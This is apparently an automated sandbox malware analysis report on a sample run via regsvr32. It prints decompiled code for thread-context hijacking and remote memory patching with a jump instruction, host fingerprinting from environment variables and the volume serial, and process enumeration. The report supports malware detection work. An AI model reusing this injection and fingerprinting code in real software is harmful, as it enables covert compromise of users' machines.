                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                        • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                        • API String ID: 494031690-2640591812
                                                                                                                                                                        • Opcode ID: 51171ef4ce001edf49c181e63098e5aed1a1b8c43c77506d4dacf7cd26d4ad0b
                                                                                                                                                                        • Instruction ID: b95ce068980fa94b0afe97d71d9a03d8dd4795820814d5ef59b6f0a93d648e0d
                                                                                                                                                                        • Opcode Fuzzy Hash: 51171ef4ce001edf49c181e63098e5aed1a1b8c43c77506d4dacf7cd26d4ad0b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A81F7B1E1021DAFDB11DF99D885EEEBBBCFB08304F144569F605AB250DB709A41CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536D959 Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 143 536d959-536d972 call 536d218 146 536da4b-536da56 call 536d38b 143->146 147 536d978-536d986 call 536d447 143->147 147->146 152 536d98c-536d9c3 call 5368d6d GetThreadContext 147->152 152->146 155 536d9c9-536da09 NtProtectVirtualMemory 152->155 156 536da0b-536da26 NtWriteVirtualMemory 155->156 157 536da49 155->157 156->157 158 536da28-536da47 NtProtectVirtualMemory 156->158 157->146 158->146 158->157
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0536D959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E0536D218(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E0536D447( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E05368D6D( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E0536D38B();
				return _t66;
			}



















                                                                                                                                                                        0x0536d965
                                                                                                                                                                        0x0536d967
                                                                                                                                                                        0x0536d969
                                                                                                                                                                        0x0536d972
                                                                                                                                                                        0x0536d97d
                                                                                                                                                                        0x0536d982
                                                                                                                                                                        0x0536d986
                                                                                                                                                                        0x0536d99a
                                                                                                                                                                        0x0536d9a2
                                                                                                                                                                        0x0536d9c3
                                                                                                                                                                        0x0536d9c9
                                                                                                                                                                        0x0536d9d1
                                                                                                                                                                        0x0536d9df
                                                                                                                                                                        0x0536d9e5
                                                                                                                                                                        0x0536d9e6
                                                                                                                                                                        0x0536d9f2
                                                                                                                                                                        0x0536d9f9
                                                                                                                                                                        0x0536da09
                                                                                                                                                                        0x0536da49
                                                                                                                                                                        0x0536da49
                                                                                                                                                                        0x0536da28
                                                                                                                                                                        0x0536da28
                                                                                                                                                                        0x0536da47
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536da47
                                                                                                                                                                        0x0536da09
                                                                                                                                                                        0x0536d9c3
                                                                                                                                                                        0x0536d986
                                                                                                                                                                        0x0536da4b
                                                                                                                                                                        0x0536da56

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0536D218: LoadLibraryW.KERNEL32 ref: 0536D312
                                                                                                                                                                          • Part of subcall function 0536D447: NtCreateSection.NTDLL(0536D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0536D4B9
                                                                                                                                                                          • Part of subcall function 0536D447: RegisterClassExA.USER32(?), ref: 0536D50D
                                                                                                                                                                          • Part of subcall function 0536D447: CreateWindowExA.USER32 ref: 0536D538
                                                                                                                                                                          • Part of subcall function 0536D447: DestroyWindow.USER32(00000000), ref: 0536D543
                                                                                                                                                                          • Part of subcall function 0536D447: UnregisterClassA.USER32 ref: 0536D54E
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                        • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0536D9BB
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0536DA04
                                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0536DA21
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0536DA42
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1578692462-0
                                                                                                                                                                        • Opcode ID: 6abdf421138ac8380edc527a091178fd2c7f224300b12bde26de848c08c48e5c
                                                                                                                                                                        • Instruction ID: 04c8b453efc44c627efbc569f6e80e3874edca3fce6994bb8808fe926fab8fa6
                                                                                                                                                                        • Opcode Fuzzy Hash: 6abdf421138ac8380edc527a091178fd2c7f224300b12bde26de848c08c48e5c
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F315E76B0410AAFDB11EFA4CD89FDEBBBCBF08200F1081A9E505E6154E770DA458BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536DF3D Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 250COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E0536DF3D(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x537f830; // 0x5360000
				_t68 = E05368BDE(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x537f818; // 0x546f8b0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E05373548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x537f818; // 0x546f8b0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E053695F3(_t194, _t207);
					}
					_t75 =  *0x537f818; // 0x546f8b0
					_t77 = E0536C879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E0536C9F4( *_t77) == 0) {
						_t79 = E0536C8C9(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E0536F3A3(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E0536F368(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x537f820; // 0x546faa0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E0536DF36(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E053695F3(_t149, _t211);
					}
					_t92 = E0536C6CE();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E0536C4C1(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E053699DF(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E0536960D(_t149, _t36);
					_t97 = E0536E2C5(_t196, E0536A43D(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E0536C6E4(_t97, _t37, _t216);
					_t99 =  *0x537f818; // 0x546f8b0
					_t101 = E0536CA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E05368D6D(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E0536DD39(_t100);
					_t106 = E0536DD62(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E05369DF2(_t105, 0x9cf);
					_t177 =  *0x537f818; // 0x546f8b0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x537f818; // 0x546f8b0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E05368BAF( &_v8);
					_t113 =  *0x537f818; // 0x546f8b0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E05369E51(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x537f818; // 0x546f8b0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x537f818; // 0x546f8b0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x537f818; // 0x546f8b0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x537f818; // 0x546f8b0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x537f818; // 0x546f8b0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x537f818; // 0x546f8b0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E05373548(E0536E2C5(_t62, E0536A43D(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E0537351A( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E053696DA(_t66, _t191);
					_t134 = E0536DAE3(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}























































                                                                                                                                                                        0x0536df3d
                                                                                                                                                                        0x0536df47
                                                                                                                                                                        0x0536df53
                                                                                                                                                                        0x0536df58
                                                                                                                                                                        0x0536df5d
                                                                                                                                                                        0x0536df6a
                                                                                                                                                                        0x0536df70
                                                                                                                                                                        0x0536df75
                                                                                                                                                                        0x0536df7b
                                                                                                                                                                        0x0536df8b
                                                                                                                                                                        0x0536df90
                                                                                                                                                                        0x0536df95
                                                                                                                                                                        0x0536df95
                                                                                                                                                                        0x0536dfa5
                                                                                                                                                                        0x0536dfab
                                                                                                                                                                        0x0536dfad
                                                                                                                                                                        0x0536dfb6
                                                                                                                                                                        0x0536dfb6
                                                                                                                                                                        0x0536dfbc
                                                                                                                                                                        0x0536dfc9
                                                                                                                                                                        0x0536dfce
                                                                                                                                                                        0x0536dfd4
                                                                                                                                                                        0x0536dfdd
                                                                                                                                                                        0x0536dfeb
                                                                                                                                                                        0x0536dff2
                                                                                                                                                                        0x0536dff7
                                                                                                                                                                        0x0536dff7
                                                                                                                                                                        0x0536dff8
                                                                                                                                                                        0x0536dfdf
                                                                                                                                                                        0x0536dfdf
                                                                                                                                                                        0x0536dfdf
                                                                                                                                                                        0x0536dffe
                                                                                                                                                                        0x0536e004
                                                                                                                                                                        0x0536e009
                                                                                                                                                                        0x0536e00f
                                                                                                                                                                        0x0536e014
                                                                                                                                                                        0x0536e01a
                                                                                                                                                                        0x0536e01a
                                                                                                                                                                        0x0536e023
                                                                                                                                                                        0x0536e029
                                                                                                                                                                        0x0536e02d
                                                                                                                                                                        0x0536e034
                                                                                                                                                                        0x0536e03b
                                                                                                                                                                        0x0536e042
                                                                                                                                                                        0x0536e046
                                                                                                                                                                        0x0536e04d
                                                                                                                                                                        0x0536e04e
                                                                                                                                                                        0x0536e050
                                                                                                                                                                        0x0536e055
                                                                                                                                                                        0x0536e05c
                                                                                                                                                                        0x0536e05e
                                                                                                                                                                        0x0536e05e
                                                                                                                                                                        0x0536e06e
                                                                                                                                                                        0x0536e073
                                                                                                                                                                        0x0536e073
                                                                                                                                                                        0x0536e080
                                                                                                                                                                        0x0536e086
                                                                                                                                                                        0x0536e08b
                                                                                                                                                                        0x0536e08d
                                                                                                                                                                        0x0536e096
                                                                                                                                                                        0x0536e096
                                                                                                                                                                        0x0536e09e
                                                                                                                                                                        0x0536e0a3
                                                                                                                                                                        0x0536e0a3
                                                                                                                                                                        0x0536e0a9
                                                                                                                                                                        0x0536e0b4
                                                                                                                                                                        0x0536e0b9
                                                                                                                                                                        0x0536e0c1
                                                                                                                                                                        0x0536e0c7
                                                                                                                                                                        0x0536e0cf
                                                                                                                                                                        0x0536e0e1
                                                                                                                                                                        0x0536e0e7
                                                                                                                                                                        0x0536e0ef
                                                                                                                                                                        0x0536e0f4
                                                                                                                                                                        0x0536e101
                                                                                                                                                                        0x0536e112
                                                                                                                                                                        0x0536e118
                                                                                                                                                                        0x0536e11d
                                                                                                                                                                        0x0536e120
                                                                                                                                                                        0x0536e123
                                                                                                                                                                        0x0536e130
                                                                                                                                                                        0x0536e136
                                                                                                                                                                        0x0536e140
                                                                                                                                                                        0x0536e140
                                                                                                                                                                        0x0536e146
                                                                                                                                                                        0x0536e14e
                                                                                                                                                                        0x0536e159
                                                                                                                                                                        0x0536e15e
                                                                                                                                                                        0x0536e164
                                                                                                                                                                        0x0536e166
                                                                                                                                                                        0x0536e173
                                                                                                                                                                        0x0536e174
                                                                                                                                                                        0x0536e175
                                                                                                                                                                        0x0536e180
                                                                                                                                                                        0x0536e182
                                                                                                                                                                        0x0536e189
                                                                                                                                                                        0x0536e189
                                                                                                                                                                        0x0536e193
                                                                                                                                                                        0x0536e198
                                                                                                                                                                        0x0536e19d
                                                                                                                                                                        0x0536e19d
                                                                                                                                                                        0x0536e1a3
                                                                                                                                                                        0x0536e1aa
                                                                                                                                                                        0x0536e1ab
                                                                                                                                                                        0x0536e1b8
                                                                                                                                                                        0x0536e1cb
                                                                                                                                                                        0x0536e1d0
                                                                                                                                                                        0x0536e1d5
                                                                                                                                                                        0x0536e1de
                                                                                                                                                                        0x0536e1de
                                                                                                                                                                        0x0536e1e4
                                                                                                                                                                        0x0536e1e9
                                                                                                                                                                        0x0536e1ef
                                                                                                                                                                        0x0536e1f5
                                                                                                                                                                        0x0536e1fa
                                                                                                                                                                        0x0536e203
                                                                                                                                                                        0x0536e205
                                                                                                                                                                        0x0536e20c
                                                                                                                                                                        0x0536e20c
                                                                                                                                                                        0x0536e212
                                                                                                                                                                        0x0536e21a
                                                                                                                                                                        0x0536e21f
                                                                                                                                                                        0x0536e220
                                                                                                                                                                        0x0536e225
                                                                                                                                                                        0x0536e22e
                                                                                                                                                                        0x0536e230
                                                                                                                                                                        0x0536e23b
                                                                                                                                                                        0x0536e23b
                                                                                                                                                                        0x0536e244
                                                                                                                                                                        0x0536e24c
                                                                                                                                                                        0x0536e253
                                                                                                                                                                        0x0536e258
                                                                                                                                                                        0x0536e267
                                                                                                                                                                        0x0536e27f
                                                                                                                                                                        0x0536e286
                                                                                                                                                                        0x0536e294
                                                                                                                                                                        0x0536e29f
                                                                                                                                                                        0x0536e2a0
                                                                                                                                                                        0x0536e2a4
                                                                                                                                                                        0x0536e2aa
                                                                                                                                                                        0x0536e2ab
                                                                                                                                                                        0x0536e2b3
                                                                                                                                                                        0x0536e2b8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536e2c0
                                                                                                                                                                        0x0536e2c4

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05368BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0536959D,00000100,?,05366507), ref: 05368BEC
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0536DF64
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0536E05E
                                                                                                                                                                        • GetSystemMetrics.USER32(00001000), ref: 0536E06E
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000000), ref: 0536E123
                                                                                                                                                                          • Part of subcall function 0536C8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,05360000), ref: 0536C96D
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0536E14E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                        • API String ID: 3131805607-2706916422
                                                                                                                                                                        • Opcode ID: d9e08141520e5c55bdbce689e305f6e119dc64236412db1dcd2400e468c001d9
                                                                                                                                                                        • Instruction ID: 09ded651cedcf57b5bf166daf63ae764138bfff469db2841d1d0ca42874a6bb3
                                                                                                                                                                        • Opcode Fuzzy Hash: d9e08141520e5c55bdbce689e305f6e119dc64236412db1dcd2400e468c001d9
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B917C71B00609AFD715EB74D849FEABBE8FF09300F00816DF519DB244DB74AA958BA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536C5EC Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E0536C5EC(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E05368D6D(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x537f818; // 0x546f8b0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E05369DF2(_t44, 0xad6);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E05368BAF( &_v16);
				_t33 = E0536A456(_t43);
				E05369E51( &(_t43[E0536A456(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0536A456(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0536E2C5(_t43, E0536A456(_t43) + _t40, 0);
			}
















                                                                                                                                                                        0x0536c5ec
                                                                                                                                                                        0x0536c5f5
                                                                                                                                                                        0x0536c601
                                                                                                                                                                        0x0536c607
                                                                                                                                                                        0x0536c609
                                                                                                                                                                        0x0536c611
                                                                                                                                                                        0x0536c61f
                                                                                                                                                                        0x0536c624
                                                                                                                                                                        0x0536c633
                                                                                                                                                                        0x0536c63e
                                                                                                                                                                        0x0536c64b
                                                                                                                                                                        0x0536c665
                                                                                                                                                                        0x0536c66a
                                                                                                                                                                        0x0536c66c
                                                                                                                                                                        0x0536c673
                                                                                                                                                                        0x0536c683
                                                                                                                                                                        0x0536c694
                                                                                                                                                                        0x0536c69e
                                                                                                                                                                        0x0536c6a6
                                                                                                                                                                        0x0536c6ad
                                                                                                                                                                        0x0536c6b0
                                                                                                                                                                        0x0536c6cd

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000100), ref: 0536C633
                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0536C665
                                                                                                                                                                          • Part of subcall function 05369E51: _vsnwprintf.MSVCRT ref: 05369E6E
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00000114), ref: 0536C69E
                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0536C6B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 455400327-0
                                                                                                                                                                        • Opcode ID: 2629e9aaa42481578834a40f5f799d8036fea33034c551c43d056e05e41b3780
                                                                                                                                                                        • Instruction ID: 66e4fb63f5f7bbca40ce99d1bac8451fbe65d1b00b40a521ae694017e16ee024
                                                                                                                                                                        • Opcode Fuzzy Hash: 2629e9aaa42481578834a40f5f799d8036fea33034c551c43d056e05e41b3780
                                                                                                                                                                        • Instruction Fuzzy Hash: 102144B3E10218BFD710ABA4DC4EFEE7BBDEB44310F108569F505E6184EE749A448B60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536B96A Relevance: 6.1, APIs: 4, Instructions: 66processCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E0536B96A(void* __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E05368D6D( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						do {
							_t43 = _v312( &_v308, _t33);
						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x537f818; // 0x546f8b0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}












                                                                                                                                                                        0x0536b982
                                                                                                                                                                        0x0536b984
                                                                                                                                                                        0x0536b988
                                                                                                                                                                        0x0536b98b
                                                                                                                                                                        0x0536b98d
                                                                                                                                                                        0x0536b992
                                                                                                                                                                        0x0536b9a1
                                                                                                                                                                        0x0536b9a9
                                                                                                                                                                        0x0536b9bd
                                                                                                                                                                        0x0536b9cd
                                                                                                                                                                        0x0536b9d7
                                                                                                                                                                        0x0536b9db
                                                                                                                                                                        0x0536b9f8
                                                                                                                                                                        0x0536b9ff
                                                                                                                                                                        0x0536b9bf
                                                                                                                                                                        0x0536b9bf
                                                                                                                                                                        0x0536b9c5
                                                                                                                                                                        0x0536b9ca
                                                                                                                                                                        0x0536b9ca
                                                                                                                                                                        0x0536b9bd
                                                                                                                                                                        0x0536ba08

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0536B988
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 0536B9B8
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,?), ref: 0536B9EB
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0536B9F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2518216231-0
                                                                                                                                                                        • Opcode ID: 6764bd79e27369c7aaac650cfbc271fb4f6244837c1ae776d4435dc63b744110
                                                                                                                                                                        • Instruction ID: 4a06082b559647b3c16d738836fcf21e9b90aa66977fe973341b07fb6a40ced3
                                                                                                                                                                        • Opcode Fuzzy Hash: 6764bd79e27369c7aaac650cfbc271fb4f6244837c1ae776d4435dc63b744110
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A1186726043056BC320EF68E84AE9B7BECFF85360F144A6DF561CB180EB20D5458BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536EEBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
